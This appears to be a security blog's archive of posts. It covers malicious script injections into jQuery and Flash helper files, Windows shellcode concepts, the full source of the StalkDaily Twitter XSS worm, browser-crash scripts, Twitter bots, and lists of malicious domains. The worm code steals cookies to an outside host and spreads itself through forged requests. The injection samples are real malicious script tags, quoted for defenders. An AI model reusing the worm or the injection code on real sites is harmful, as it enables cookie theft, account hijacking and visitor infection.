Code injection attacks are constantly morphing. The bad guys are constantly looking to deposit malicious code into websites in order to infect visitors to these sites. Once the visitors are infected, their machines can become part of extremely large bot armies and can be used to propagate the cycle of code injection attacks further. This is usually done by sniffing the clear-text ftp user name and password that most people use to update their websites with new content.

Traditionally hackers have always used obfuscated code, packed scripts and all sorts of techniques which would flummox the average joe. Now there is an increasing concentration on modifying or hacking scripts that pre-exist on websites.

Most websites use scripts such as jquery.js and AC_RunActiveContent.js. These are prime candidates for getting hacked.

What do these “benign” scripts do?

JQuery (jquery.com) is a fast and concise JavaScript Library that simplifies HTML document traversing, event handling, animating, and Ajax interactions for rapid web development.

JQuery provides a wrapper to the core applications of JavaScript (e.g. animation, AJAX, form validation) as straight-forward interfaces which can be employed in the rest of the code, providing a scripting layout that is faster, simpler and easier to use.

When content developers want to  publish a Flash document associated with HTML using the “Flash Only” or “Flash HTTPS” HTML templates, a JavaScript file linked to the HTML file, named AC_RunActiveContent.js will automatically be created. This file will need to remain with the HTML file for the JavaScript-based active content embedding. A JavaScript function called AC_FL_RunContent() is used to dynamically generate the necessary object and embed tags necessary for the browser to display your Flash movie. This function is defined within AC_RunActiveContent.js and called in the location of your HTML file where you wish your Flash movie to be displayed.

• Adobe Knowledgebase
  

The Hacks

Hackers have now started to focus more on these scripts by inserting code like the samples below.

Owners of websites and content creators should be aware of these evolving threats and should be on their toes to deal with them. One way is to get sha1 and MD5 hashes for these benign scripts and compare them frequently. Consider this badwarebusters.com post, even until a few minutes ago there have been cases of similar hacks popping up. In this case also a benign script was compromised with nearly the same code as the one used for the jquery hack.

Adios all, till the next in this vein of posts. And as usual, StopTheHacker is always here to help.

Consider an example of AC_RunActiveContent.js being hacked:

  method.onMouseRight = function(event) {
    this.bubbleUp(event);
  }

NOF.Flash.__proto__.ComponentsMouseListener = NOF_Flash_ComponentsMouseListener;
}

document.write('<script src=http://spielwaren-carl-loebner.de/shop/team.php ><\/script>');

Now JQuery, consider code like the below, right on top of the main source.

$a="Z6fpZ3dZ22Z2524Z2561Z253dZ2522dw(dcZ2573(cuZ252c14Z2529);Z2522;Z22;ceZ3dZ223hZ2561Z2572CodZ2565At
(Z2530)^(Z25270Z2578Z25300Z2527+esZ2529));Z257d}Z22;cdZ3dZ22Z253dst+Z2553triZ256egZ252efZ2572Z256fmZ254
3haZ2572CZ256fdeZ2528(Z2574mp.Z256Z22;czZ3dZ22Z2566uZ256ectZ2569onZ2520cZ257a(czZ2529Z257bretZ2575rZ256eZ
2520ca+Z2563Z2562+cZ2563Z252bcZ2564+ceZ252bczZ253bZ257d;Z22;cbZ3dZ22pZ2565(Z2564s)Z253bstZ253dtmpZ253dZ25
27Z2527;for(iZ253d0;iZ253cds.Z256cenZ22;stZ3dZ22Z2573Z2574Z253dZ2522$aZ253dZ2573Z2574;Z2564cZ2573Z2528dZ2
561Z252bdZ2562+Z2564cZ252bZ2564dZ252bdZ2565,Z2531Z2530)Z253bZ2564Z2577Z2528Z2573tZ2529;Z2573Z2574Z253dZ25
24Z2561;Z2522;Z22;dzZ3dZ22Z2566unZ2563tioZ256e dZ2577(tZ2529Z257bcaZ253dZ2527Z252564oZ252563umeZ25256etZ2
52ewZ252572Z252569Z252574Z2565Z252528Z252522Z2527;ceZ253dZ2527Z252522Z252529Z2527;cbZ253dZ2527Z25253cscrZ
252

(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=funct

Add to this existence of tons of other scripts, live-clocks and the many more people get from dynamic drive and sites similar to it, the scale of this relatively “silent” attack vector is very large.

And this time right after the body of the main code:

• badwarebusters.org

var ret = handler.apply(this, arguments);

if( ret !== undefined ) {
	event.result = ret;
	if ( ret === false ) {
		event.preventDefault();

document.write(sc ript src=hxxp://stroysauna.ru/da37d9e b94067800b6205421a826ccd0/links.php><\/sc ript>);
document.write(s cript src=hxxp://stroysauna.ru/da37d9eb94067800b6205421a826ccd0/lin ks.php ><\/script>');
document.write(scr ipt src=hxxp://cafeimperio.ee/cache/INSTALL.php ><\/script>');
document.write(sc ript src=hxxp://cafeimperio.ee/cache/INSTALL.php ><\/script>');
document.write(sc ript src=hxxp://cafeimperio.ee/cache/INSTALL.php ><\/script>');
document.write(scri pt src=hxxp://cafeimperio.ee/cache/INSTALL.php ><\/script>');
document.write(scri pt src=hxxp://sportsdisplaycases.net/baseball/sitemap.php ><\/scri pt>');
document.write(scr ipt src=hxxp://sportsdisplaycases.net/baseball/sitemap.php ><\ / sc ript>');
document.write(sc ript src=hxxp://sportsdisplaycases.net/baseball/sitemap.php ><\/scri pt>');
document.write(scr ipt src=hxxp://sportsdisplaycases.net/baseball/sitemap.php ><\/scr ipt>');

Here’s a really recent example:

• badwarebusters.org

The malicious code present looks like below and is inserted at the end of the benign ac_runactivecontent.js script.

default:
 ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1];
 }
 }
 ret.objAttrs["classid"] = classid;
 if (mimeType) ret.embedAttrs["type"] = mimeType;
 return ret;
}

document.write('<sc ript src=hxxp://tet asperu.pe/wordpress/video11.php ><\/script>');
document.write('<scr ipt src=hxxp://sam poong.co.kr/admin/SMALL_UPDIR/index.php ><\/script>');
document.write('<scri pt src=hxxp://wor phueser.de/032c0698b3108c214/032c0698b31084b13.php ><\/script>');
document.write('<sc rip t src=hxxp://wor phueser.de/032c0698b3108c214/032c0698b31084b13.php ><\/script>');
document.write('<scr ipt src=hxxp://wor phueser.de/032c0698b3108c214/032c0698b31084b13.php ><\/script>');

And if you haven’t had a fill of it yet… here’s more:

this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]||
document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],
document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],
document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):
this.css(J,typeof K==="string"?K:K+"px")}})})();

document.write('<s c ript src=http://lou- ferrigno.info/.smileys/sinbad.php ><\/script>');
document.write('<scri pt src=http://lou-fe rrigno.info/.smileys/sinbad.php ><\/script>');
document.write('<scri pt src=http://lou-fer rigno.info/.smileys/sinbad.php ><\/script>');
document.write('<scri pt src=http://lou-ferr igno.info/.smileys/sinbad.php ><\/script>');
document.write('<scri pt src=http://lou-ferri gno.info/.smileys/sinbad.php ><\/script>');
document.write('<scrip t src=http://lou-ferrig no.info/.smileys/sinbad.php ><\/script>');
document.write('<scri pt src=http://l ou-ferrign o.info/.smileys/sinbad.php ><\/script>');
document.write('<scr ipt src=http://lo u-ferrigno.info/.smileys/sinbad.php ><\/script>');
document.write('<script src=http://lou- ferrigno.info/.smileys/sinbad.php ><\/script>');
document.write('<sc ript src=http://lou- ferrigno.info/.smileys/sinbad.php ><\/script>');
document.write('<scrip t src=http://lou-f errigno.info/.smileys/sinbad.php ><\/script>');
document.write('<scri pt src=http://lou-fe rrigno.info/.smileys/sinbad.php ><\/script>');
document.write('<scr ipt src=http://lou-fer rigno.info/.smileys/sinbad.php ><\/script>');
document.write('<sc ript src=http://lou-ferr igno.info/.smileys/sinbad.php ><\/script>');
document.write('<s cript src=http://lou-ferri gno.info/.smileys/sinbad.php ><\/script>');
document.write('<scrip t src=http://lou-ferrig no.info/.smileys/sinbad.php ><\/script>');
document.write('<scri pt src=http://lou-ferrign o.info/.smileys/sinbad.php ><\/script>');
document.write('<scr ipt src=http://f ici.com/promotional-wall-calendars/cal1.php ><\/script>');
document.write('<sc ript src=http://sc hitkomplekt.ru/price/index.php ><\/script>');
document.write('<s cript src=http://fic i.com/promotional-wall-calendars/cal1.php ><\/script>');
document.write('<scrip t src=http://fici .com/promotional-wall-calendars/cal1.php ><\/script>');
document.write('<scri pt src=http://kalai kaviri-offcamp.com/images/gifimg.php ><\/script>');
document.write('<scr ipt src=http://kolons port.com.cn/images/b54/gifimgz.php ><\/script>');
document.write('<script src=http://brandper fumes.co.uk/tips_on_how_to_wear_your_perfume_correctly/require.php ><\/script>');
document.write('<scri pt src=http://salgoo.c om/data/_tail.php ><\/script>');
document.write('<scr ipt src=http://thecelebr itynetwork.netfirms.com/_vti_pvt/rwpzo.php ><\/script>');
document.write('<sc ript src=http://thecelebri tynetwork.netfirms.com/_vti_pvt/rwpzo.php ><\/script>');

Security

Although a bit dated, these pointers for shell coding provide a decent starting point for enthusiasts to go and poke around with binaries :-). Most of the information is collected from various texts on nologin.org (read win32-shellcode.pdf and many more) during the last few years and experiences with binaries. These pointers are definitely good for win 9x/2k/NT, some are applicable to XP too.

Here we go!

NT-based versions of Windows expose a system call interface through int 0×2e. Newer versions of NT, such as Windows XP, are capable of using the optimized sysenter instruction. Both of these mechanisms accomplish the goal of transitioning from Ring3, user-mode, to Ring0, kernel-mode.

Windows, like Linux, stores the system call number, or command, in the eax register.

The system call number in both operating systems is simply an index into an array that stores a function pointer to transition to once the system call interrupt is received.

System call numbers are prone to change between versions of Windows whereas Linux system call numbers are set in stone. This difference is the source of the problem with writing reliable shell code for Windows and for this reason it is generally considered “bad practice” to write code for Windows that uses system calls directly

Unlike Linux, Windows does not export a socket API via the system call interface. This immediately eliminates the possibility of doing network based shell code via this mechanism.

In Windows, like Unix variants, standard user-mode API’s are exported in the form of dynamically loadable objects that are mapped into process space during run time. The common names for these types of object files are Shared Object (.so) or, in the case of Windows, Dynamically Linked Library (.dll).

The possibility exists for users to change the address that kernel32.dll loads at by using the rebase.exe tool.

The process of determining the kernel32.dll base address involves making use of the Process Environment Block (PEB).

The operating system allocates a structure for every running process that can always be found at fs:[0×30] from within the process.

The PEB structure holds information about the process’ heaps, binary image information, and, most importantly, three linked lists regarding loaded modules that have been mapped into process space. The linked lists themselves differ in purposes from showing the order in which the modules were loaded to the order in which the modules were initialized. The initialization order linked list is of most interest as the order in which kernel32.dll is initialized is always constant as the second module to be initialized. It is this fact that one can take the most advantage of. By walking the list to the second entry, one can deterministically extract the base address for kernel32.dll.

DLL Portable Executable images have an export directory table. The export directory table holds information such as the number of exported symbols as well as the Relative Virtual Address (RVA) of the functions array, symbol names array, and ordinals array. These arrays match one-to-one with exported symbol indexes.

To resolve a symbol one must walk the export table by going through the symbol names array and hashing the string name associated with the given symbol until it matches the hash of the symbol requested.

A string can be optimized down into a four byte hash.

Sometimes one can make use of a DLL’s Import Address Table to resolve the VMA of functions for use in a reliable fashion (used in Metasploit samples).

Connectback shell code, or reverse shell as it is also called, is the process by which a TCP connection is established to a remote host and a command interpreter’s output and input are directed to and from the allocated TCP connection.

Happy coding!

Security

Twitter is over capacity. In this vein, here’s a post from gist.github.com which displays the source code for the stalkdaily twitter XSS worm. Its a good example of how to use CSRF/XSRF with XSS.

function XHConn()
{
  var xmlhttp, bComplete = false;

  try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
  catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
  catch (e) { try { xmlhttp = new XMLHttpRequest(); }
  catch (e) { xmlhttp = false; }}}

  if (!xmlhttp) return null;

  this.connect = function(sURL, sMethod, sVars, fnDone)
  {
    if (!xmlhttp) return false;

    bComplete = false;
    sMethod = sMethod.toUpperCase();

    try {
      if (sMethod == "GET")
      {
        xmlhttp.open(sMethod, sURL+"?"+sVars, true);
        sVars = "";
      }
      else
      {
        xmlhttp.open(sMethod, sURL, true);
        xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
        xmlhttp.setRequestHeader("Content-Type",
          "application/x-www-form-urlencoded");
      }

      xmlhttp.onreadystatechange = function(){
        if (xmlhttp.readyState == 4 && !bComplete)
        {
          bComplete = true;
          fnDone(xmlhttp);
        }};
      xmlhttp.send(sVars);
    }

    catch(z) { return false; }

    return true;
  };

  return this;
}

function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();

    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    };

    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';

    ret = encodeURIComponent(ret);

    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    }

    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    });

    return ret;
}

var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);

var username = userreg.exec(content);
username = username[1];

var cookie;
cookie = urlencode(document.cookie);

document.write("<img src='http://mikeyylolz. u uuq.com/x.ph p?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkd aily.com/log.gif'>");

function wait()
{
  var content = document.documentElement.innerHTML;
  authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);

  var authtoken = authreg.exec(content);
  authtoken = authtoken[1];

  //alert(authtoken);

  var randomUpdate=new Array();
  randomUpdate[0]="Dude, www.Stalk Daily.com is awesome. What's the fuss?";
  randomUpdate[1]="Join www.StalkDa ily.com everyone!";
  randomUpdate[2]="Woooo, www.StalkDaily.com :) ";
  randomUpdate[3]="Virus!? What? www .StalkDaily.com is legit!";
  randomUpdate[4]="Wow...www.StalkDai ly.com";
  randomUpdate[5]="@twitter www.StalkD aily.com";

  var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];

  updateEncode = urlencode(genRand);

  var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mik eyylolz.uuuq.com/x.js"></script><a ');

  var ajaxConn = new XHConn();
  ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");

  var ajaxConn1 = new XHConn();
  ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}

setTimeout("wait()",3250);

News, Security

Building on my post, Beef with IE, here’s another little look into what can crash the world’s most popular browser.  Running this script may crash your browser so save your work.  Again, I’m not sure whether to classify this as malware or something else.

<script type="text/javascript">
function c() {
    var li = document.createElement("li");
    li.setAttribute("value", "1");
    li.value = "1";
}
</script>

Tested with IE7 Vista, IE6 XP2, IE6 XP3 (courtesy milw0rm).

Security

Twitter has now become the undeniable darling of marketing enthusiasts, as this medium of communication has augured millions of dedicated users. This has also led to a lot of the bad guys looking at this medium to spread bile.

I am going to provide some links based on which some “twitspam” tool-kits are developed. I am not going to discuss how XSS/malware injection is used to spam users, but will look into developing a twitter bot.

The basic concepts are pretty well established: bots. Used on nearly every software communication channel known, from IRC to what not. A whole list of bots for twitter is available at twitter.pbworks.com. In fact you can even create you own bot at www.botomatic.com.

If you are a pythonista, this might be of interest to you. It logs into your email server to retrieve and analyze tweets and take appropriate action.

• flowingdata.com

from imaplib import *
from email.Parser import Parser
import datetime, time, email, email.Utils
import re

# Connect to email server
server = IMAP4("__EMAIL_SERVER.COM__")
server.login("__EMAIL_ACCOUNT_NAME__", "__EMAIL_PASSWORD__")
r = server.select("INBOX")

# Find only new mail (i.e. new direct messages)
r, data = server.search(None, "(NEW)")

# If there are new direct messages:
if len(data[0]) > 0:

	p = Parser()

	# Loop through new emails
	for num in data[0].split():

		# Who email is from (Should be one line, broken for display only)
		r, data = server.fetch(num, '(BODY[HEADER.FIELDS
			(DATE SUBJECT FROM X-TwitterEmailType X-TwitterSenderScreenName
			X-TwitterCreatedAt X-TwitterRecipientScreenName)])')
		msg = p.parsestr(data[0][1])
		who = msg.__getitem__('From')
		matchemail = re.compile(r'[\w\-][\w\-\.]+@[\w\-][\w\-\.]+[a-zA-Z]{1,4}')
		email_addy = matchemail.findall(who)[0]

		# Twitter username
		twitter_un = msg.__getitem__('X-TwitterSenderScreenName')

		# If the email is a direct message sent from Twitter
		if msg.__getitem__('X-TwitterEmailType') == 'direct_message':

		# When direct message sent, convert to epoch seconds
			twitter_time = msg.__getitem__('X-TwitterCreatedAt').strip()
			time_tuple = email.Utils.parsedate(twitter_time)
			epoch_seconds = time.mktime(time_tuple)

			# Get body of email sent by Twitter
			r, data = server.fetch(num, '(RFC822.TEXT)')
			body = data[0][1]
			twitter_dm = body.split("\r\n\r\n")[0].strip()

			# Do something with the twitter direct message...
			# Parse it...
			# Store it in a database?...

# Logout of email server
server.logout()

There’s a five minute version in PHP too!

• www.smmguru.com

<?php
    mysql_connect("localhost", "USERNAME", "PASSWORD") or die('Could not connect to database');
    mysql_select_db("DATABASE") or die('Could not select database');

    $result = mysql_query ("SELECT * FROM tweets ORDER BY RAND() LIMIT 1");

    while($row = mysql_fetch_array($result)){
        $tweet = "$row[tweet]";
        sendTweet($tweet);
    }

    function sendTweet($msg){
        $username = 'TWITTER-USER-NAME';
        $password = 'TWITTER-PASS';

        $url = 'http://twitter.com/statuses/update.xml';

        $curl_handle = curl_init();

        curl_setopt($curl_handle, CURLOPT_URL, "$url");
        curl_setopt($curl_handle, CURLOPT_CONNECTTIMEOUT, 2);
        curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl_handle, CURLOPT_POST, 1);
        curl_setopt($curl_handle, CURLOPT_POSTFIELDS, "status=$msg");
        curl_setopt($curl_handle, CURLOPT_USERPWD, "$username:$password");

        $buffer = curl_exec($curl_handle);

        curl_close($curl_handle);

        if (empty($buffer)) {
            echo 'fail';
        } else {
            echo 'success';
        }
    }
?>

Security

A lot of people I meet often think that NOP Sled and Heap Spraying are actually the same thing. Not true at all. I wanted to write a description myself, but there were already good pointers on Wikipedia.

Heap Spray

“In computer security, heap spraying is a technique used in exploits to facilitate arbitrary code execution. The term is also used to describe the part of the source code of an exploit that implements this technique. In general, code that sprays the heap attempts to put a certain sequence of bytes at a predetermined location in the memory of a target process by having it allocate (large) blocks on the process’ heap and fill the bytes in these blocks with the right values. They commonly take advantage from the fact that these heap blocks will roughly be in the same location every time the heap spray is run. Heap sprays for web browsers are commonly implemented in JavaScript and spray the heap by creating large Unicode strings with the same character repeated many times by starting with a string of one character and concatenating it with itself over and over. This way, the length of the string can grow exponentially up to the maximum length allowed by the scripting engine. When the desired string length is reached a shell code is put at the end of the string. The heap spraying code makes copies of the long string with shell code and stores these in an array, up to the point where enough memory has been sprayed to cover the area that the exploit targets. Occasionally, VBScript is used in Internet Explorer to create strings by using the String function.”

NOP Sled

“In computer CPUs, a NOP slide, NOP sled or NOP ramp, is a sequence of NOP (no-operation) instructions (on Intel x86, this is the opcode 0×90) meant to “slide” the CPU’s instruction execution flow to its final, desired, destination. Generally a NOP slide will be used in cases where execution will branch into a position that cannot be determined with absolute accuracy, therefore “padding” the memory area before and after the approximate branch address is performed in the hope of avoiding an exception which would cause the program or system to crash. Once the CPU branches anywhere within the NOP slide, its IP (instruction pointer) will “slide” to its final destination, where there is valid code to be executed.”

Hope this helps.

Security

I’ve never been a fan of IE and one particular incident sways the decision I made long ago to switch to other browsers pretty decisively for me. I spend time tinkering with both JavaScript and Browsers, and some time back I came across a script to iterate through DOM objects on a  page. This script tried doing this using the ‘document.write’ method, used to output text to the document. I remember the outcome well. Firefox chugs along well – but IE, throws an unhandled exception and goes bonkers. The script in question is just one line long, or 61 bytes, and that it can be embedded into any webpage. Running this script may crash your browser so save your work. I don’t know whether to classify this as malware or something else.

<script>
for (x in document.write) {
    document.write(x);
}
</script>

Security

Here’s some interesting piece of news, Opera 10, the shiny new version of one of the finest browsers available today has released a new version. Its slick and has tons of eye candy. One really interesting part about the new version is that it lets you start what’s known as Opera-Unite: this is basically a high-level plug-in which allows you to add more plug-ins/modules/functionality into your browser so that you can share files/pictures/music. The most interesting part though is the ability to make your browser act as a web server.

And here it comes: from my experience in how the bad guys work, limited as it may be compared to stalwarts in the industry. I think this is an immensely attractive attack vector for the malware industry.

Consider the fact that browser, almost always have flaws. Websites almost always suffer from XSS flaws which allow code injection, browser hijacking, session stealing, cookie manipulation and what not. Combine this with the fact that a lot of people still download email attachments carelessly and will click on phishing links. If you are still reading, let me throw in the fact that AVs are not a 100% accurate by any standards… not even close.

My prediction: There’s an attack coming which will exploit the Opera Unite functionality, it will be loosely based on XSS and will inject malware pages directly into a users computer and will be served up by the Opera Unite web server.

Another interesting twist, Opera now provides the ability to have what you share on your computer be listed in search engine results. So hey, if you want to infect a large number of machines, propagate malware via search engine results… this could be a good way to go.  For those of you who are thinking Google’s Safebrowsing will definitely profile the bad search entries, I have two words: Polymorphism and scale.

Google does have the capability to add 6000+ bad sites to its malware hash list everday, they are probably testing 50-60 times that number anyways but hey to profile a whole mal-net based on of Opera browsers would be something.

Of course the Opera team, which is excellent, would definitely do its bit to protect its users, and hence the time window for exploitation would be short. However, problems (functionality/XSS) still remain, which can be exploited, see below.

My Opera

Potential XSS vulnerability.

Security

For the last few weeks we have been receiving communication from affected parties who have been hit with a spate of iframe injection attacks. If you see any of these sites embedded as an iframe or as an HTTP link on your site, it would be good to consider removing them.

DO NOT VISIT THESE SITES AS THEY MIGHT HOST LIVE MALWARE

Russia

3cw.ru
3f0.ru
3f2.ru
a3l.ru
a5j.ru
aj4.ru
b5r.ru
b8e.ru
c1z.ru
c3q.ru
c5e.ru
c6y.ru
f5l.ru
f6y.ru
f7g.ru
last-life.ru
playbetwager.cn
q0a.ru
q0v.ru
q3c.ru
q3s.ru
q3t.ru
q59.ru
u0b.ru
u0r.ru
u1a.ru
u1m.ru
u5c.ru
u5k.ru
u5l.ru
u6b.ru
u6c.ru
u7x.ru
u9k.ru
x0c.ru
x0q.ru
x1i.ru
x7o.ru
x8e.ru
x9f.ru
xb4.ru
xc8.ru
xe5.ru
xe6.ru
xq0.ru
xt7.ru

Security

For the last few weeks we have been receiving communication from affected parties who have been hit with a spate of iframe injection attacks. If you see any of these sites embedded as an iframe or as an HTTP link on your site, it would be good to consider removing them.

DO NOT VISIT THESE SITES AS THEY MIGHT HOST LIVE MALWARE

China

bigtopsuper.cn
liteautoexcellent.cn
mediahomenamemartvideo.cn
literideinsurance.cn
liteautogreatestonline.cn
findbigwords.cn
hotslotpot.cn
superlitecarbest.cn
superlottry.cn
findyourbigwhy.cn
litegreatestdirect.cn
playbetwager.cn
greatliteautobest.cn
mediahousenameshopfilm.cn
liteautotoponline.cn
mixante.cn
namebuyfilmlife.cn
homenameworld.cn
namebuypicture.cn
mainnameshop.cn
lotultimatebet.cn
blockcenterplay.cn
findbigbrother.cn
namemartfilmlife.cn
findbigname.cn
dotcomnameshop.cn
homenameregistration.cn
findbigbearproperty.cn
compoundcapitolgroup.cn
mediahomenameshoppicture.cn
cheapslotplay.cn
thelotbet.cn
bestwebfind.cn
litecartop.cn
liteautobestworld.cn
cutlot.cn
thebestyoucanfind.cn
superbetfair.cn
liteautotop.cn
lotwager.cn
topfindworld.cn
betworldwager.cn
hugebest.cn
yourlitetop.cn
giantbest.cn
betbigwager.cn
nameashop.cn
hugepremium.cn
featherlitecarcare.cn
filmproductionlifemedia.cn
lotmachinesguide.cn
lotante.cn
bigtruckstopseek.cn
bigtopartists.cn
mediahousenamemartmovie.cn
litetopdetect.cn
internetnamestore.cn
thebettings.cn
gianttopseek.cn
thelitefinest.cn
litecarfinestsite.cn
litefinestdirect.cn

Security